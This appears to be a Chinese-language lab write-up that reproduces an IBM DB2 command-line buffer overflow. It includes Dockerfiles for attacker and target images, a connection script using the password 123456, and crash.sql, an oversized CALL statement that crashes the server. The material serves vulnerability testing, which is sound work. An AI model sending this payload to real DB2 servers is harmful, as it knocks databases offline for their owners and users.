参考链接
IBM DB2 9.7/10.1/10.5/11.1 - Command Line Processor Buffer Overflow - Multiple dos Exploit
漏洞说明
IBM DB2 for Linux, UNIX and Windows 9.2, 10.1, 10.5, and 11.1 (includes DB2 Connect Server) is vulnerable to a stack-based buffer overflow, caused by improper bounds checking which could allow a local attacker to execute arbitrary code.
攻击镜像构建
exp.sh:1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
echo "[+] 正在准备连接目标db2数据库"
echo $1
echo $2
db2 catalog tcpip4 node remotedb remote $1 server $2
db2 catalog database testdb3 as testdb33 at node remotedb
db2 connect to testdb33 user db2inst1 using 123456
echo "[+] 已连接成功目标数据库"
echo "[+] 正在查询目标数据库数据"
# 查询数据
db2 -f select.sql
echo "[+] 正在发送PoC"
# 发送 PoC
db2 -f crash.sql
echo "[+] PoC发送成功"
echo "[+] 再次尝试查询数据库"
db2 -f select.sqlselect.sql:1
select * from tbl4
crash.sql:1
CALL AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
entrypoint.sh:1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
cd server && ./db2prereqcheck && echo 'ESE' | ./db2_install -b /opt/ibm/db2/V9.7 || echo pass
cd /opt/ibm/db2/V9.7/instance && ./dascrt -u dasusr1
./db2icrt -u db2inst1 db2inst1
su - db2inst1 -c "db2start"
su - db2inst1 -c "db2set DB2COMM=TCPIP"
su - db2inst1 -c "db2 update dbm cfg using SVCENAME 60000"
su - db2inst1 -c "db2stop"
su - db2inst1 -c "db2start"
echo "finish"
echo "Remote IP: $REMOTE_IP"
echo "Remote PORT: $REMOTE_PORT"
# STR=$(echo $3 | cut -d "[" -f 2 |cut -d "]" -f 1 | cut -d "'" -f 2)
# echo $STR
su - db2inst1 -c "cd / && bash /exp.sh $REMOTE_IP $REMOTE_PORT"
tail -f /dev/nullDockerfile:1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54FROM centos:7.2.1511
COPY v9.7_linuxx64_server.tar.gz v9.7_linuxx64_server.tar.gz
# COPY sysctl.conf /etc/sysctl.conf
RUN tar -xzvf v9.7_linuxx64_server.tar.gz
RUN rm v9.7_linuxx64_server.tar.gz
RUN yum install -y libstdc++ libstdc++.so.6 libaio
# RUN chmod 644 /etc/sysctl.conf
# RUN sysctl -p
RUN ipcs -l
RUN groupadd -g 901 db2iadm1 && \
groupadd -g 902 db2fadm1 && \
groupadd -g 903 dasadm1 && \
useradd -g db2iadm1 -u 801 -d /home/db2inst1 -m db2inst1 && \
useradd -g db2fadm1 -u 802 -d /home/db2fenc1 -m db2fenc1 && \
useradd -g dasadm1 -u 803 -d /home/dasadm1 -m dasusr1 &&\
echo 'db2inst1:123456' | chpasswd
# CMD ["tail",'-f','/dev/null']
# RUN cd server && ./db2prereqcheck && echo 'ESE' | ./db2_install -b /opt/ibm/db2/V9.7 || echo pass
# RUN cd /opt/ibm/db2/V9.7/instance && ./dascrt -u dasusr1 &&\
# ./db2icrt -u db2inst1 db2inst1
# RUN db2 create database KHYX_YS using codeset GBK territory CN
# RUN db2 create database KHYX_YS
# RUN db2set –all
COPY entrypoint.sh /entrypoint.sh
COPY exp.sh /exp.sh
COPY select.sql /select.sql
COPY crash.sql /crash.sql
RUN chmod +x /entrypoint.sh
RUN chmod +x /exp.sh
ENV REMOTE_IP=${REMOTE_IP}
ENV REMOTE_PORT=${REMOTE_PORT}
ENTRYPOINT ["/entrypoint.sh"]
# CMD ['REMOTE_IP']
# CMD ["tail",'-f','/dev/null']
EXPOSE 60000镜像构建(获得docker_image_id_1)
1
docker build .
被测环境搭建
create_table.sql:1
2
3
4
5
6
7
8
9
10
11
12
13
14CREATE DATABASE testdb3
connect to testdb3
CREATE TABLE tbl4 (stu_name CHAR(10) NOT NULL PRIMARY KEY)
ALTER TABLE tbl4 ADD COLUMN stu_age CHAR(10)
INSERT INTO tbl4 VALUES ('alice','20')
INSERT INTO tbl4 VALUES ('bob','16')
INSERT INTO tbl4 VALUES ('tom','19')
INSERT INTO tbl4 VALUES ('john','32')
INSERT INTO tbl4 VALUES ('amy','13')
INSERT INTO tbl4 VALUES ('france','56')
INSERT INTO tbl4 VALUES ('frank','41')
SELECT * FROM tbl4entrypoint.sh:1
2
3
4
5
6
7
8
9
10
11
cd server && ./db2prereqcheck && echo 'ESE' | ./db2_install -b /opt/ibm/db2/V9.7 || echo pass
cd /opt/ibm/db2/V9.7/instance && ./dascrt -u dasusr1
./db2icrt -u db2inst1 db2inst1
su - db2inst1 -c "db2set DB2COMM=TCPIP"
su - db2inst1 -c "db2 update dbm cfg using SVCENAME 60000"
su - db2inst1 -c "db2stop"
su - db2inst1 -c "db2start"
su - db2inst1 -c "cd / && db2 -f create_table.sql"Dockerfile:1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38FROM centos:7.2.1511
COPY v9.7_linuxx64_server.tar.gz v9.7_linuxx64_server.tar.gz
# COPY sysctl.conf /etc/sysctl.conf
RUN tar -xzvf v9.7_linuxx64_server.tar.gz
RUN rm v9.7_linuxx64_server.tar.gz
RUN yum install -y libstdc++ libstdc++.so.6 libaio
RUN ipcs -l
RUN groupadd -g 901 db2iadm1 && \
groupadd -g 902 db2fadm1 && \
groupadd -g 903 dasadm1 && \
useradd -g db2iadm1 -u 801 -d /home/db2inst1 -m db2inst1 && \
useradd -g db2fadm1 -u 802 -d /home/db2fenc1 -m db2fenc1 && \
useradd -g dasadm1 -u 803 -d /home/dasadm1 -m dasusr1 &&\
echo 'db2inst1:123456' | chpasswd
COPY entrypoint.sh /entrypoint.sh
# COPY exp.sh /exp.sh
COPY create_table.sql /create_table.sql
# COPY crash.sql /crash.sql
RUN chmod +x /entrypoint.sh
# RUN chmod +x /exp.sh
# ENV REMOTE_IP=${REMOTE_IP}
ENTRYPOINT ["/entrypoint.sh"]
EXPOSE 60000
# CMD ['REMOTE_IP']
# CMD ["tail",'-f','/dev/null']镜像构建(获得docker_image_id_2)
1
docker build.
被测环境容器启动(比较慢)
1 | docker run -it -d --privileged -p 60000:60000 docker_image_id_2 |
攻击脚本执行
1 | # REMOTE_IP为被测环境的ip |
攻击成功效果
1 | ……(此处省略n行)…… |